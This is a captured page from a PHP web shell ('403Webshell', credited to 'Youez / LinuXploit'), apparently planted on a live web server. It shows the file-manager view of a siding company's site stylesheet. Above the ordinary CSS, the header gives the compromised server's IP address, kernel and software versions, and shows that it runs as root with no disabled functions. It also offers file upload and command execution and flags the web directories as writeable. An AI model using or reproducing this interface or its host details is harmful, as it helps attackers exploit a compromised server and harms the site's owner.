403Webshell
Server IP : 139.59.63.204  /  Your IP : 216.73.217.62
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ubuntu-s-1vcpu-1gb-blr1-01 6.8.0-110-generic #110-Ubuntu SMP PREEMPT_DYNAMIC Thu Mar 19 15:09:20 UTC 2026 x86_64
User : root ( 0)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/azsiding/html/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/azsiding/html/css/style.css
body {font-family: "Raleway", sans-serif;}
a:focus, a:hover {
    text-decoration: none;
}
.mainheader {
    /* left: 0; */
    /* right: 0; */
    width: 100%;
    /* top: 0; */
    z-index: 9;
    position: absolute;
}
.mainheader i.fa {
    background: green;
    color: #FFF;
    border-radius: 50%;
    padding: 9px;
}

.mainheader .tophead {
    padding: 0;
    background: #040E27;
}

.mainheader .tophead .header_left p {
    color: #FFFFFF;
    font-weight: 500;
    font-size: 14px;
    margin-bottom: 0;
}

.mainheader .tophead .boxed-btn3 {
    padding: 14px 50px;
}

.boxed-btn3 {
    background: #008752;
    color: #fff;
    display: inline-block;
    padding: 19px 50px;
    font-family: "Raleway", sans-serif;
    font-size: 14px;
    border: 0;
    -webkit-border-radius: 0px;
    -moz-border-radius: 0px;
    border-radius: 0px;
    text-align: center;
    color: #fff;
    text-transform: uppercase;
    -webkit-transition: 0.3s;
    -moz-transition: 0.3s;
    -o-transition: 0.3s;
    transition: 0.3s;
    cursor: pointer;
    font-weight: 600;
}

.slider_area {
    position: relative;
    z-index: 0;
}

.features {
    position: relative;
    margin-top: -150px;
    padding-bottom: 0;
}

.features_gutter{
    background: #008752;
    color: #FFF;
    border-radius: 22px;
}

.overlay {
    position: relative;
    z-index: 0;
}

.overlay::before {
    position: absolute;
    content: "";
    background: #001D38;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    z-index: -1;
    opacity: .5;
}

.mainheader .logoarea {
    background: rgba(4, 14, 39, 0.5);
    padding-top: 29px;
    padding-bottom: 64px;
}

.mainheader .logoarea .address_menu .single_address {
    margin-left: 80px;
}

.mainheader .logoarea .address_menu .single_address .icon {
    margin-right: 15px;
}

.mainheader .logoarea .address_menu .single_address .address_info h3 {
    font-size: 13px;
    color: #008752;
    text-transform: uppercase;
    margin-bottom: 0;
}

.mainheader .logoarea .address_menu .single_address .address_info p {
    font-size: 14px;
    font-weight: 500;
    color: #fff;
    margin-bottom: 0;
}

.mainheader .main-mainheader .white_background {
    background: #fff;
    -webkit-border-radius: 10px;
    -moz-border-radius: 10px;
    border-radius: 10px;
    position: relative;
    margin-top: -35px;
    padding: 10px 20px;
}

.mainheader .main-mainheader .main-menu {
    padding: 12px 0;
}

ul {
    margin: 0px;
    padding: 0px;
}

.mainheader .main-mainheader .main-menu ul li {
    display: inline-block;
    position: relative;
    margin: 0 10px;
}

.mainheader .main-mainheader .main-menu ul li a {
    color: #040E27;
    font-size: 14px;
    text-transform: capitalize;
    font-weight: 500;
    display: inline-block;
    padding: 0px 0px 0px 0px;
    font-family: "Raleway", sans-serif;
    position: relative;
    text-transform: capitalize;
}
.mainheader .main-mainheader .main-menu ul li a:hover, .mainheader .main-mainheader .main-menu ul li a:focus {
    color:#008752;
    font-weight: bold;
}

.mainheader .main-mainheader .main-menu ul li a:hover::before {
    opacity: 1;
    transform: scaleX(1);
}

.mainheader .main-mainheader .main-menu ul li a.active::before {
    opacity: 1;
    transform: scaleX(1);
}
.mainheader .main-mainheader .main-menu ul li .submenu li a {
    padding: 10px 15px;
    position: inherit;
    -webkit-transition: 0.3s;
    -moz-transition: 0.3s;
    -o-transition: 0.3s;
    transition: 0.3s;
    display: block;
    color: #000;
}

.mainheader .main-mainheader .main-menu ul li a::before {
    position: absolute;
    content: "";
    background: #008752;
    width: 100%;
    height: 3px;
    bottom: -24px;
    left: 0;
    opacity: 0;
    transform: scaleX(0);
    -webkit-transition: 0.3s;
    -moz-transition: 0.3s;
    -o-transition: 0.3s;
    transition: 0.3s;
}
.mainheader .main-mainheader .main-menu ul li .submenu a::before{
    background: none;
}

.mainheader .main-mainheader .main-menu ul li .submenu {
    position: absolute;
    left: 0;
    top: 160%;
    background: #fff;
    width: 200px;
    z-index: 2;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.02);
    opacity: 0;
    visibility: hidden;
    text-align: left;
    -webkit-transition: 0.6s;
    -moz-transition: 0.6s;
    -o-transition: 0.6s;
    transition: 0.6s;
}

.mainheader .main-mainheader .main-menu ul li .submenu li {
    display: block;
}

.mainheader .main-mainheader .main-menu ul li:hover > .submenu {
    opacity: 1;
    visibility: visible;
    top: 198%;
  }

  .mainheader .main-mainheader .main-menu ul li .submenu li a {
    padding: 10px 15px;
    position: inherit;
    -webkit-transition: 0.3s;
    -moz-transition: 0.3s;
    -o-transition: 0.3s;
    transition: 0.3s;
    display: block;
    color: #000;
}

.slider_area .single_slider {
    height: 900px;
    background-size: cover;
    background-repeat: no-repeat;
    background-position: center center;
}

.slider_bg_1 {
    background-image: url(../img/banner/Az_Siding_Before.jpg);
  }

.slider_bg_2 {
    background-image: url(../img/banner/Az_Siding_After.jpg);
  }

  .slider_area .owl-carousel .owl-nav div {
    height: 120px;
    left: 0px;
    width: 50px;
    color: #fff;
    background-color: transparent;
    -webkit-border-radius: 0;
    -moz-border-radius: 0;
    border-radius: 0;
    left: 50px;
    font-size: 14px;
    border: none;
    left: 150px;
    line-height: 120px;
    background: rgba(255, 255, 255, 0.2);
    left: 0;
    border: none !important;
}

.slider_area .single_slider .slider_text h3 {
    font-family: "Raleway", sans-serif;
    font-size: 60px;
    text-transform: uppercase;
    letter-spacing: 2px;
    font-weight: 700;
    line-height: 70px;
    margin-bottom: 0px;
    color: #fff;
}
.slider_area .single_slider .slider_text p {
    font-size: 20px;
    font-weight: 600;
    color: #FFF;
    margin-bottom: 33px;
    margin-top: 16px;
}

.slider_area .owl-carousel .owl-nav div {
    height: 120px;
    left: 0px;
    width: 50px;
    color: #fff;
    background-color: transparent;
    -webkit-border-radius: 0;
    -moz-border-radius: 0;
    border-radius: 0;
    left: 50px;
    font-size: 14px;
    border: none;
    left: 150px;
    line-height: 120px;
    background: rgba(255, 255, 255, 0.2);
    left: 0;
    border: none !important;

    position: absolute;
    text-align: center;
    top: 50%;
}
.slider_area .owl-carousel .owl-nav div.owl-next {
    right: 0;
    left: auto;
}

.owl-carousel .owl-nav div.owl-prev i {
    position: relative;
    top: 0px;
}

/**/
.features {
    position: relative;
    margin-top: -150px;
    padding-bottom: 0;
    background: #00875229;
}
.features .single_feature {
    margin-bottom: 30px;
    padding: 50px 30px 40px 30px;
    -webkit-transition: 0.3s;
    -moz-transition: 0.3s;
    -o-transition: 0.3s;
    transition: 0.3s;
}
.features .single_feature h3 {
    font-size: 22px;
    font-weight: 600;
    color: #FFF;
    margin-top: 8px;
    margin-bottom: 18px;
}

.features .icon i {
    font-size: 57px;
}

.aboutus {
    padding-top: 90px;
    padding-bottom: 100px;
    background: #00875229;
}

.aboutus .aboutus_img {
    box-shadow: 20px -20px 0px #36755c5c;
    border: 1px solid;
}

.aboutus .aboutus_img img {
    width: 100%;
}

.aboutus .about_info h3 {
    font-size: 42px;
    font-weight: 600;
    color: #040E27;
    line-height: 52px;
}

.services_section {
    padding-bottom: 120px;
    padding-top: 60px;
}

.services_section div.thumb {
    text-align: center;
    border: 1px solid #000;
    border-radius: 2px;
    padding: 3px;
}
.services_section div.thumb i {color:#008752; font-size: 20px;}

.services_section .single_service .service_info {
    padding-top: 30px;
}

.services_section .single_service {
    margin-bottom: 60px;
}

.services_section .single_service .service_info p {
    font-size: 16px;
    line-height: 28px;
    color: #596672;
    margin-bottom: 11px;
    margin-top: 10px;
}

.services_section .single_service .service_info a h3 {
    font-size: 22px;
    font-weight: 600;
    color: #040E27;
    text-transform: capitalize;
    -webkit-transition: 0.3s;
    -moz-transition: 0.3s;
    -o-transition: 0.3s;
    transition: 0.3s;
}

.services_section .single_service .service_info a {
    color: #008752;
    font-size: 16px;
}

.mb-50 {
    margin-bottom: 50px;
}

.section_title h3 {
    font-size: 42px;
    font-weight: 600;
    color: #040E27;
    position: relative;
    z-index: 0;
    padding-bottom: 0;
    line-height: 52px;
}

.border_bottom_1px {
    border-bottom: 1px solid #EAEAEA;
}



.contact_us {
    background-image: url(../img/contact.png);
    background-repeat: no-repeat;
    background-size: cover;
    padding: 137px 0;
}

.contact_us .contact_text h3 {
    font-size: 42px;
    font-weight: 600;
    color: #fff;
    margin-bottom: 0;
    line-height: 52px;
}




.whyus {
    background-size: cover;
    background-position: center center;
    background-repeat: no-repeat;
    padding: 173px 0;
}
.chose_bg_1 {
    background-image: url(../img/chose_banner.png);
}



.testimonial_section {
    background: #fff;
    padding: 120px 0 115px 0;
}

.testimonial_section .single_testmonial h4 {
    color: #040E27;
    font-size: 20px;
    font-weight: 500;
    margin-bottom: 5px;
}
.testimonial_section .single_testmonial p {
    color: #040E27;
    font-weight: 400;
    font-size: 20px;
    line-height: 32px;
    margin-top: 13px;
}


.footer {
    background-repeat: no-repeat;
    background-position: center center;
    background-repeat: no-repeat;
    background-size: cover;
    background: #040E27;
    position: relative;
    z-index: 9;
}

.footer .download_brochure .bordered_1px {
    border-bottom: 1px solid #363E52;
    padding-bottom: 60px;
    padding-top: 80px;
}

.footer .footer_top {
    padding-top: 75px;
    padding-bottom: 124px;
}

.footer .footer_top .footer_widget .footer_title {
    font-size: 18px;
    font-weight: 500;
    color: #fff;
    text-transform: capitalize;
    margin-bottom: 40px;
}
.footer .footer_top .footer_widget a {
    color:#919191;
}
.footer .footer_top .footer_widget p {
    color: #919191;
    font-size: 14px;
    font-weight: 400;
    line-height: 28px;
}

.footer .socail_links {
    margin-top: 47px;
}

.footer .footer_top .footer_widget ul li {
    color: #ACACAC;
    font-size: 14px;
    line-height: 36px;
}

.footer .footer_top .footer_widget .newsletter_form {
    position: relative;
    margin-bottom: 20px;
}

.footer .footer_top .footer_widget .newsletter_text {
    font-size: 14px;
    color: #919191;
    line-height: 26px;
}

.footer .socail_links ul li {
    display: inline-block;
}
.footer .socail_links ul li a {
    font-size: 30px;
    margin: 0px 14px 0px 0px;
}

li {
    list-style: none;
}

.footer .footer_top .footer_widget ul li a {
    color: #919191;
    font-weight: 400;
}

.footer .download_brochure .download_btn {
    text-align: right;
}

.footer .download_brochure .download_btn a {
    display: inline-block;
    border: 1px solid #686E7D;
    font-size: 16px;
    text-transform: uppercase;
    font-weight: 600;
    color: #fff;
    padding: 17px 37px;
}

a, button {
    color: #1F1F1F;
    outline: medium none;
}
a, .button {
    -webkit-transition: 0.3s;
    -moz-transition: 0.3s;
    -o-transition: 0.3s;
    transition: 0.3s;
}

@media (max-width: 767px) {
    .mainheader .main-mainheader {
        background: #040E27;
    }
    .mainheader {
        padding-top: 35px;
    }

    .mobile_menu {
        position: absolute;
        right: 0px;
        width: 100%;
        z-index: 9;
    }

    .chose_bg_1 {
        background-image: none;
        background: #ddecf9;
    }
}


.tags {
    list-style: none;
    margin: 0;
    overflow: hidden; 
    padding: 0;
  }
  
  .tags li {
    float: left; 
  }
  
  .tag {
    background: #eee;
    border-radius: 3px 0 0 3px;
    color: #000;
    display: inline-block;
    height: 26px;
    line-height: 26px;
    padding: 0 20px 0 23px;
    position: relative;
    margin: 0 10px 10px 0;
    text-decoration: none;
    -webkit-transition: color 0.2s;
    border: 1px solid #008752;
  }
  
  .tag::before {
    background: #fff;
    border-radius: 10px;
    box-shadow: inset 0 1px rgba(0, 0, 0, 0.25);
    content: '';
    height: 6px;
    left: 10px;
    position: absolute;
    width: 6px;
    top: 10px;
  }
  
  .tag:hover {
    background-color: #008752;
    color: white;
  }
  
  .tag:hover::after {
     border-left-color: #008752; 
  }

Youez - 2016 - github.com/yon3zu
LinuXploit